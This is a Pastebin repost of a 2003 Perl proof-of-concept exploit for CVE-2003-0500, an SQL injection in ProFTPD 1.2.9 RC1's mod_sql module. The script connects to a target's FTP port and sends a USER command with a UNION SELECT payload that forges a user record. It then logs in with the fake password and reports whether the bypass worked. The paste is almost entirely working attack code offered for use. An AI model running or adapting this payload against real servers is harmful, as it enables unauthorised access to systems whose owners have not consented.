Advertisement
FlyFar

ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection - CVE-2003-0500

Feb 2nd, 2024
1,587
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.26 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. # ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
  3. # Spaine - 2003
  4.  
  5. use IO::Socket;
  6. if(@ARGC<2){
  7.     print "\nProof Of Concept Sql Inject on ProFTPD\n";
  8.     print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
  9.     exit(0);
  10. };
  11.  
  12. $server = $ARGV[0];
  13. $query = $ARGV[1];
  14. $remote =
  15. IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
  16.                           or die "Can't connect. \n";
  17. if(defined($line=<$remote>)){
  18.     print STDOUT $line;
  19. }
  20.  
  21. # Proof of concept query, it may change on the number of rows
  22. # By default, it can query User, Pass, Uid, Gid, Shell or
  23. # User, Pass, Uid, Gid, Shell, Path, change the union query...
  24.  
  25. if($query eq "1"){
  26.     print $remote "USER ')UNION
  27. SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
  28. }else{
  29.     print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
  30. WHERE(''='\n";
  31. };
  32. if(defined($line=<$remote>)){
  33.     print STDOUT $line;
  34. }
  35. print $remote "PASS p\n";
  36. if(defined($line=<$remote>)){
  37.     print STDOUT $line;
  38. }
  39. print "Sent query to $ARGV[0]\n";
  40. if($line =~ /230/){  #logged in
  41.     print "[------- Sql Inject Able \n";
  42. }else{
  43.     print "[------- Sql Inject Unable \n";
  44. }
  45. close $remote;
  46.  
  47. # milw0rm.com [2003-06-19]
  48.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement